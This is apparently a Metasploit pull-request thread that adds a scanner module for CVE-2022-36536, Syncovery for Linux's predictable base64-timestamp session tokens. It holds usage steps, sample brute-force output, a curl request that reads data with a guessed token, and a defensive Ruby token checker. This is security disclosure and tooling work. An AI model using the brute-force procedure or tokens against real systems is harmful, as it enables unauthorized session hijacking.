metasploit-framework
Syncovery For Linux - Insecure Session Token Generation (CVE-2022-36536)
This pull request adds the following module for vulnerabilities found in Syncovery for Linux. The vulnerabilities have been communicated to the vendor and are fixed in the current release. CVEs are pending. A vulnerable version can be downloaded from the vendor website: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
CVE-2022-36536: Insecure Session Token Generation
Up to Syncovery v9.48j, session tokens are generated insecurely: base64(MM/dd/yyyy HH:mm:ss). This allows brute-forcing valid session tokens.
Verification
- Download and install a vulnerable version
- use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536
- set RHOSTS <TARGET HOSTS>
- run
- On success you should get a valid token.
More information can be found on our website: https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
You can automate most of these changes with the -a flag:
rubocop -a <directory or file>
Please update your branch after these have been made, and reach out if you have any problems.
As @adfoster-r7 commented, I also believe it is possible to take advantage of the scanner framework for this. As an example, this module performs a brute force with only passwords (no username), which would be very similar to what your module is doing. The related login scanner library file can be found here.
So, basically, you will need to create a private credential collection (Metasploit::Framework::PrivateCredentialCollection.new) without any option and populate the collection using add_private (see its implementation here). Then, you will need to update the existing attempt_login method in lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb to accept both authentication methods (user/password and token) and execute the corresponding logic.
Thanks for sharing. This was the hint I needed. I will try to implement this.
Alright, module is using scanner framework now and should be good to go. Thanks for your help!
Thanks @whoot ! Everything looks good to me now. I tested against Syncovery version 9.47a and verified the token has been correctly guessed. I'll go ahead and land it.
- Example output
msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > run verbose=true rhosts=192.168.2.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.40:8999 - Syncovery 9.47a
[+] The target appears to be vulnerable.
[*] 192.168.2.40:8999 - Starting Brute-Forcer
[-] 192.168.2.40:8999 - INVALID TOKEN: MTIvMTQvMjAyMiAxMToyNjo0Mg==
[-] 192.168.2.40:8999 - INVALID TOKEN: MTIvMTQvMjAyMiAxMToyNjo0MQ==
...
[+] 192.168.2.40:8999 - VALID TOKEN: MTIvMTQvMjAyMiAxMToyNjowMQ==
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- Verification
❯ curl -H "token:MTIvMTQvMjAyMiAxMTo1Njo0NA==" "http://192.168.2.40:8999/profiles.json"
[{ "Rows":[{"id":"0", "Name":"test_profile", "RightPath":"\/tmp\/etc", "LeftPath":"\/etc", "Progress":"6 copied (432.3kB)", "isDisabled":"false", "isLocked":"false", "LastRun":"Today, 12:16:39", "NextRun":"12\/14\/2023, 12:16:37"}] }, {"TotalRows":"1"} ]%
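As an added check (not code from the module or from anyone in this thread), the following Ruby decodes a Syncovery session token and reports whether it still has the predictable base64(MM/dd/yyyy HH:mm:ss) layout described in this PR. An administrator can feed it the token issued to a fresh login after upgrading to confirm the instance is no longer on an affected build. The timestamp tokens are the ones visible in the module output above; the opaque token and the helper names are constructed for this example.

```ruby
require 'base64'

# Layout of the weak token described in the PR: base64("MM/dd/yyyy HH:mm:ss").
WEAK_TOKEN_RE = %r{\A(\d{2})/(\d{2})/(\d{4}) (\d{2}):(\d{2}):(\d{2})\z}

# Returns the Time encoded in a weak Syncovery session token, or nil when the
# token is not valid base64 or does not decode to the timestamp layout.
def weak_syncovery_token_time(token)
  decoded = begin
    Base64.strict_decode64(token.to_s.strip)
  rescue ArgumentError
    return nil # not base64 at all, so certainly not the weak layout
  end
  m = WEAK_TOKEN_RE.match(decoded)
  return nil unless m

  month, day, year, hour, min, sec = m.captures.map(&:to_i)
  # Reject impossible field values before building the Time.
  return nil unless (1..12).cover?(month) && (1..31).cover?(day)
  return nil unless hour < 24 && min < 60 && sec < 60

  Time.utc(year, month, day, hour, min, sec)
end

# True when the token is predictable from its issue time (affected build).
def weak_syncovery_token?(token)
  !weak_syncovery_token_time(token).nil?
end

# Audit helper (constructed name): given tokens collected from logins, return
# only those that decode to a timestamp, as { token => Time }. An empty result
# for a freshly issued token means the instance no longer uses the weak scheme.
def audit_session_tokens(tokens)
  tokens.each_with_object({}) do |t, weak|
    time = weak_syncovery_token_time(t)
    weak[t] = time if time
  end
end

if $PROGRAM_NAME == __FILE__
  # Two tokens from the module output on this page plus one constructed
  # opaque token ("not-a-timestamp" in base64) that passes the check.
  sample = ['MTIvMTQvMjAyMiAxMToyNjo0Mg==', 'MTIvMTQvMjAyMiAxMTo1Njo0NA==',
            'bm90LWEtdGltZXN0YW1w']
  audit_session_tokens(sample).each { |t, time| puts "#{t} -> #{time} (predictable)" }
end
```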
Release Notes
A new login scanner module that brute-forces a valid session token for the Syncovery File Sync & Backup Software Web-GUI. This will work if the default user is already logged in to the application. If they do not log out, the token stays valid until the next reboot.